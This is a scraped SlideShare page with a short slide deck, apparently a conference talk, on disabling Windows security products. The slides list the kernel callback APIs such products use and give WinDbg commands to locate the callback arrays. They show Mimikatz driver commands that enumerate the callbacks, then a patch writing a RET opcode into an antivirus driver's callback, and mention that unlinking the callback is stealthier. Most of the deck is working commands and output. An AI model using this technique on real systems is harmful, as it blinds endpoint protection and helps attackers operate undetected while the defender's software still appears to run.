Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.
Killing any security product 
… using a Mimikatz undocumented feature 
@newsoft
How to write a security product for Windows? 
“There is only one way to do it” 
… since Windows Vista
How to write a security product for Windows? 
ObRegisterCallbacks 
PsSetCreateProcessNotifyRoutine (process) 
PsSetCreateP...
Finding process callbacks with WinDbg 
kd> dd nt!PspCreateProcessNotifyRoutineCount l1 
fffff800`02a821a4 00000005 
kd> dd...
Other callbacks 
kd> dd nt!PspCreatethreadNotifyRoutineCount l1 <<< Thread 
fffff800`02a81f80 00000000 
kd> dd nt!PspLoadI...
We need automation! 
Enter Mimikatz magic ...
Magic command #1 
mimikatz # !+ 
[*] mimikatz driver not present 
[+] mimikatz driver successfully registered 
[+] mimikat...
Magic command #2 
mimikatz # !notifObject 
... 
* Process 
* Callback [type 3] 
PreOperation : 0xFFFFF880035B66E0 [ehdrv.s...
Back in WinDbg 
kd> e ehdrv+0x0001c6e0 c3 
0xC3 == RET opcode 
After this patch, the notification callback will do nothing...
Conclusion 
Cons 
● You need kernel write access 
○ Being able to write a single NULL byte is enough, 
though 
Pros 
● Wil...
Prochain SlideShare
Chargement dans…5
×

Killing any security product … using a Mimikatz undocumented feature

  • Soyez le premier à commenter

Killing any security product … using a Mimikatz undocumented feature

  1. 1. Killing any security product … using a Mimikatz undocumented feature @newsoft
  2. 2. How to write a security product for Windows? “There is only one way to do it” … since Windows Vista
  3. 3. How to write a security product for Windows? ObRegisterCallbacks PsSetCreateProcessNotifyRoutine (process) PsSetCreateProcessNotifyRoutineEx PsSetCreateThreadNotifyRoutine (thread) PsSetCreateThreadNotifyRoutineEx PsSetLoadImageNotifyRoutine CmRegisterCallback (registry) CmRegisterCallbackEx FltRegisterFilter (file) FltStartFiltering
  4. 4. Finding process callbacks with WinDbg kd> dd nt!PspCreateProcessNotifyRoutineCount l1 fffff800`02a821a4 00000005 kd> dd nt!PspCreateProcessNotifyRoutineExCount l1 fffff800`02a821a0 00000002 kd> dp nt!PspCreateProcessNotifyRoutine l8 fffff800`02a81fa0 fffff8a0`00008d6f fffff8a0`001b79ff fffff800`02a81fb0 fffff8a0`002e784f fffff8a0`002e7bff fffff800`02a81fc0 fffff8a0`003f295f fffff8a0`001dc53f fffff800`02a81fd0 fffff8a0`031ef24f 00000000`00000000
  5. 5. Other callbacks kd> dd nt!PspCreatethreadNotifyRoutineCount l1 <<< Thread fffff800`02a81f80 00000000 kd> dd nt!PspLoadImageNotifyRoutineCount l1 <<< Image load fffff800`02a81d60 00000002 kd> dp nt!PspLoadImageNotifyRoutine l3 fffff800`02a81d20 fffff8a0`000927ef fffff8a0`002a23cf fffff800`02a81d30 00000000`00000000 kd> dd nt!CmpCallBackCount l1 <<< Registry fffff800`02a63b04 00000001 kd> x nt!CallbackListHead fffff800`02ad8970 nt!CallbackListHead = <no type information>
  6. 6. We need automation! Enter Mimikatz magic ...
  7. 7. Magic command #1 mimikatz # !+ [*] mimikatz driver not present [+] mimikatz driver successfully registered [+] mimikatz driver ACL to everyone [+] mimikatz driver started
  8. 8. Magic command #2 mimikatz # !notifObject ... * Process * Callback [type 3] PreOperation : 0xFFFFF880035B66E0 [ehdrv.sys + 0x0001c6e0] Open - 0xFFFFF80002D9D300 [ntoskrnl.exe + 0x00348300] Close - 0xFFFFF80002D83010 [ntoskrnl.exe + 0x0032e010] Delete - 0xFFFFF80002D822C0 [ntoskrnl.exe + 0x0032d2c0] Security - 0xFFFFF80002DB52A0 [ntoskrnl.exe + 0x003602a0] ...
  9. 9. Back in WinDbg kd> e ehdrv+0x0001c6e0 c3 0xC3 == RET opcode After this patch, the notification callback will do nothing Unlinking from the callbacks list is also doable ● Requires more work ... ● … but is less detectable (no code alteration)
  10. 10. Conclusion Cons ● You need kernel write access ○ Being able to write a single NULL byte is enough, though Pros ● Will kill any security tool ● The software will still be “active and running” from a monitoring point of view - just not being notified

    Soyez le premier à commenter

    Identifiez-vous pour voir les commentaires

  • ssuser372a10

    Feb. 2, 2017

Vues

Nombre de vues

6 020

Sur Slideshare

0

À partir des intégrations

0

Nombre d'intégrations

109

Actions

Téléchargements

41

Partages

0

Commentaires

0

Mentions J'aime

1

×